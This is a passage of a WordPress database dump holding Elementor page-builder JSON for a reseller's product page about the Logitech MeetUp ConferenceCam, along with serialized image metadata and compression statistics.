resolution, color balance, detail, and audio in tight spaces. With the included wall mount and compact design that minimizes cable clutter, MeetUp optimizes the huddle room experience.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"544ff47\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6da856b\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/4xwIpyv3KOs\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"19d44ac\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"e256d3d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7f589de\",\"elType\":\"widget\",\"settings\":{\"wp_gallery\":[{\"id\":2930,\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/meetup-conference-cam.jpg\"},{\"id\":2932,\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/meetup-conference-cam-3.jpg\"},{\"id\":2933,\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/meetup-conference-cam-2.jpg\"}],\"thumbnail_size\":\"medium\",\"gallery_columns\":\"3\",\"open_lightbox\":\"yes\"},\"elements\":[],\"widgetType\":\"image-gallery\"}],\"isInner\":false},{\"id\":\"9e2b2c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9f49a3c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>EXTRAS PROVIDE MORE CONVENIENCE<\\/h3><p>Our free mobile app (available on Google Play and iTunes) turns your smartphone or tablet into a remote control for MeetUp. Add accessories such as the Logitech Expansion Mic and TV Mount for different room sizes and configurations. Order replacement parts if needed to keep everything up and running.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7bfe2ba\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3d69037\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"937331b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>5X ZOOM<\\/h4><p>Perfectly frame presenters to minimize background distractions. Zoom in on whiteboards and objects so remote participants can see what you see. Thanks to its advanced 4K image sensor, video remains sharp and clear, even when you zoom in on the details.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"eed4149\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7519127\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>PREMIUM CAMERA OPTICS<\\/h4><p>MeetUp features exquisitely engineered, premium camera optics that capture a wide field-of-view without distorting faces and furniture with a \\u201cfisheye\\u201d effect. Faces look natural, whiteboard writing remains legible, and straight lines stay straight.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d707460\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"5f5fe8e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>EXPANSION MIC-READY<\\/h4><p>Logitech Expansion Mic for MeetUp provides greater flexibility in huddle room configurations. MeetUp\\u2019s built-in beamforming mics are optimized for up to 8 feet (2.4 meters). To extend that range up to 14 feet (4.2 meters), add an Expansion Mic. So whether people are seated at a table, sitting against the wall, or walking around the room, Expansion Mic for MeetUp means everyone will be heard.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7ea6e88\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a43dc18\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>CERTIFIED FOR BUSINESS<\\/h4><p>MeetUp offers a plug-and-play USB connection to conference room computers, and is certified for Skype for Business and ready for Teams, Microsoft Cortana\\u00ae, Cisco Jabber\\u2122 compatible, and offers enhanced integration with BlueJeans, Broadsoft, LifeSize Cloud, Vidyo,Fuze and Zoom. If your preferred application can recognize a webcam, you can use it with MeetUp.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0264c10\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"05c50ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0569406\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>BLUETOOTH\\u00ae SPEAKERPHONE<\\/h4><p>Already connected on your smartphone? Dialing into an audio conference? Pair MeetUp with your smartphone or tablet to enjoy outstanding audio clarity, volume, and range that handheld devices can\\u2019t match.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"83af3f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8d354cd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>TAKE CONTROL<\\/h4><p>MeetUp gives you two ways to aim the camera, zoom in and out, set and recall presets, and manage volume and mute. The included remote control uses radio frequency (RF) signals for reliable and discrete control from anywhere in the room. Or, download the free Logi Remote app (available on Google Play and iTunes to control MeetUp with a smartphone or tablet.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dec4b8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1d8f69f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>VERSATILE TV MOUNT<\\/h4><p>Logitech TV Mount for MeetUp lets you mount the MeetUp ConferenceCam either above or below a flat-panel monitor, and attaches to the industry-standard VESA mounting points available on most TVs and monitors.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9173c99\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4e17717\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>RIGHTSENSE<\\/h4><p>Logitech RightSense\\u2122 proactive technologies make better video meetings easy and automatic.H\\u00ae RightSound optimizes the human voice and enhances conversational clarity, RightSight automatically moves the camera and adjusts the zoom so no one gets left out of the picture, and RightLight helps everyone look their best on camera, regardless of lighting conditions. With RightSense on board, video meetings are naturally more beautiful and efficient with no calibration, manual intervention or support required.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"22541c6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8bcc61c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"33840d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[maxbutton id=\\\"3\\\"]<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(5465,2932,'_wp_attached_file','2019/03/meetup-conference-cam-3.jpg'),(5466,2932,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:930;s:6:\"height\";i:523;s:4:\"file\";s:35:\"2019/03/meetup-conference-cam-3.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"meetup-conference-cam-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"meetup-conference-cam-3-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"meetup-conference-cam-3-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:35:\"meetup-conference-cam-3-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:35:\"meetup-conference-cam-3-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:35:\"meetup-conference-cam-3-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:33:\"meetup-conference-cam-3-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5467,2933,'_wp_attached_file','2019/03/meetup-conference-cam-2.jpg'),(5468,2933,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:930;s:6:\"height\";i:523;s:4:\"file\";s:35:\"2019/03/meetup-conference-cam-2.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"meetup-conference-cam-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"meetup-conference-cam-2-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"meetup-conference-cam-2-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:35:\"meetup-conference-cam-2-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:35:\"meetup-conference-cam-2-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:35:\"meetup-conference-cam-2-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:33:\"meetup-conference-cam-2-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5469,2934,'_wp_attached_file','2019/03/meetup-conference-cam-1.jpg'),(5470,2934,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:930;s:6:\"height\";i:523;s:4:\"file\";s:35:\"2019/03/meetup-conference-cam-1.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"meetup-conference-cam-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"meetup-conference-cam-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"meetup-conference-cam-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:35:\"meetup-conference-cam-1-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:35:\"meetup-conference-cam-1-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:35:\"meetup-conference-cam-1-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";}}'),(5471,2932,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:12.742507251047374694508107495494186878204345703125;s:5:\"bytes\";i:7908;s:11:\"size_before\";i:62060;s:10:\"size_after\";i:54152;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.67999999999999971578290569595992565155029296875;s:5:\"bytes\";i:458;s:11:\"size_before\";i:3348;s:10:\"size_after\";i:2890;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.82000000000000028421709430404007434844970703125;s:5:\"bytes\";i:625;s:11:\"size_before\";i:5777;s:10:\"size_after\";i:5152;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.42999999999999971578290569595992565155029296875;s:5:\"bytes\";i:3134;s:11:\"size_before\";i:20314;s:10:\"size_after\";i:17180;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.96000000000000085265128291212022304534912109375;s:5:\"bytes\";i:491;s:11:\"size_before\";i:4929;s:10:\"size_after\";i:4438;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.050000000000000710542735760100185871124267578125;s:5:\"bytes\";i:1216;s:11:\"size_before\";i:11009;s:10:\"size_after\";i:9793;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.8900000000000005684341886080801486968994140625;s:5:\"bytes\";i:1984;s:11:\"size_before\";i:16683;s:10:\"size_after\";i:14699;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(5472,2933,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:2.9319053587026697726969359791837632656097412109375;s:5:\"bytes\";i:2316;s:11:\"size_before\";i:78993;s:10:\"size_after\";i:76677;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.11000000000000031974423109204508364200592041015625;s:5:\"bytes\";i:158;s:11:\"size_before\";i:3843;s:10:\"size_after\";i:3685;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.9199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:206;s:11:\"size_before\";i:7057;s:10:\"size_after\";i:6851;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.859999999999999875655021241982467472553253173828125;s:5:\"bytes\";i:765;s:11:\"size_before\";i:26747;s:10:\"size_after\";i:25982;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.95000000000000017763568394002504646778106689453125;s:5:\"bytes\";i:193;s:11:\"size_before\";i:6538;s:10:\"size_after\";i:6345;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.560000000000000053290705182007513940334320068359375;s:5:\"bytes\";i:353;s:11:\"size_before\";i:13800;s:10:\"size_after\";i:13447;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.04999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:641;s:11:\"size_before\";i:21008;s:10:\"size_after\";i:20367;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(5473,2934,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:4.224312743012706761192021076567471027374267578125;s:5:\"bytes\";i:6812;s:11:\"size_before\";i:161257;s:10:\"size_after\";i:154445;s:4:\"time\";d:0.12000000000000000943689570931383059360086917877197265625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.28000000000000024868995751603506505489349365234375;s:5:\"bytes\";i:340;s:11:\"size_before\";i:6440;s:10:\"size_after\";i:6100;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.3499999999999996447286321199499070644378662109375;s:5:\"bytes\";i:609;s:11:\"size_before\";i:11375;s:10:\"size_after\";i:10766;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.5800000000000000710542735760100185871124267578125;s:5:\"bytes\";i:2615;s:11:\"size_before\";i:57158;s:10:\"size_after\";i:54543;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.29999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:554;s:11:\"size_before\";i:10453;s:10:\"size_after\";i:9899;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.319999999999999840127884453977458178997039794921875;s:5:\"bytes\";i:963;s:11:\"size_before\";i:28984;s:10:\"size_after\";i:28021;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.70000000000000017763568394002504646778106689453125;s:5:\"bytes\";i:1731;s:11:\"size_before\";i:46847;s:10:\"size_after\";i:45116;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}}}'),(5478,2935,'_elementor_data','[{\"id\":\"00be070\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"84682c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0a77ac1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>MEETUP<\\/h2><p>All-in-One ConferenceCam with an extra-wide field of view and integrated audio, perfect for small conference and huddle rooms<\\/p><ul><li>See everyone, even those close to the camera<\\/li><li>RightSense\\u2122 Technologies with automatic framing<\\/li><li>Compact design minimizes cabling and clutter<\\/li><\\/ul>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"03b6797\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"963c473\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/meetup-conference-cam.png\",\"id\":1316}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f3383c\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39a9a19\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fd44a2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>PERFECT FOR SMALL ROOMS<\\/h2><p>MeetUp is Logitech\\u2019s premier ConferenceCam designed for small conference rooms and huddle rooms. Stop crowding around laptops. With an extra wide field of view, motorized lens and rightsight\\u2122 auto framing plus a pan\\/tilt lens, MeetUp makes every seat at the table clearly visible. With integrated audio optimized for huddle room acoustics, everyone can be heard as well as seen.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a1e6e4a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"93a8ede\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f333ba6\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/tD_tmRMN2OA\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"65c40a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9a6e2b9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>A WIDE VIEW FOR TIGHT SPACES<\\/h3><p>Logitech\\u00ae MeetUp brings remarkable video quality to small conference rooms. Its extra wide field-of-view easily accommodates huddle rooms where people sit on either side of the camera. The 4K ultra high-def sensor and Logitech lens deliver extra sharp clarity, while pan, tilt, and zoom controls let you focus on presenters and their visual aids.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a3562e7\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"fc4fd72\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2c46c3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>HEARING IS BELIEVING<\\/h3><p>Housed within a patent-pending anti-vibration enclosure, three beamforming mics MeetUp\\u2019s integrated audio is optimized for huddle room acoustics, delivering exceptional sound in small rooms. Three beamforming mics and a custom-tuned speaker ensure meetings sound as great as they look. Add Expansion Mic for MeetUp to extend the audio range up to 4.2 meters.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"679bfe0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6a0541c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/meetup-conference-cam.jpg\",\"id\":2930}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d325f5c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ce92ebf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"1e20686\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/CqeUIzYth_w\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"f858b37\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"fcf3b26\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>AS EASY AS PLUG AND PLAY<\\/h3><p>Step into a huddle room and instantly start a video collaboration. Whether it is Video conferencing, recording, or broadcasting applications that support USB cameras MeetUp simply works.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5350d12\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"939cb8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6523bac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DESIGNED FOR THE WAY PEOPLE MEET<\\/h3><p>Small conference rooms are growing in popularity, and MeetUp rises to the challenge. It provides superb resolution, color balance, detail, and audio in tight spaces. With the included wall mount and compact design that minimizes cable clutter, MeetUp optimizes the huddle room experience.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"544ff47\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6da856b\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/4xwIpyv3KOs\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"19d44ac\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"e256d3d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"51124da\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":2932,\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/meetup-conference-cam-3.jpg\"},{\"id\":2933,\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/meetup-conference-cam-2.jpg\"},{\"id\":2934,\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/meetup-conference-cam-1.jpg\"}],\"thumbnail_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"9e2b2c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9f49a3c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>EXTRAS PROVIDE MORE CONVENIENCE<\\/h3><p>Our free mobile app (available on Google Play and iTunes) turns your smartphone or tablet into a remote control for MeetUp. Add accessories such as the Logitech Expansion Mic and TV Mount for different room sizes and configurations. Order replacement parts if needed to keep everything up and running.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7bfe2ba\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3d69037\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"937331b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>5X ZOOM<\\/h4><p>Perfectly frame presenters to minimize background distractions. Zoom in on whiteboards and objects so remote participants can see what you see. Thanks to its advanced 4K image sensor, video remains sharp and clear, even when you zoom in on the details.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"eed4149\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7519127\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>PREMIUM CAMERA OPTICS<\\/h4><p>MeetUp features exquisitely engineered, premium camera optics that capture a wide field-of-view without distorting faces and furniture with a \\u201cfisheye\\u201d effect. Faces look natural, whiteboard writing remains legible, and straight lines stay 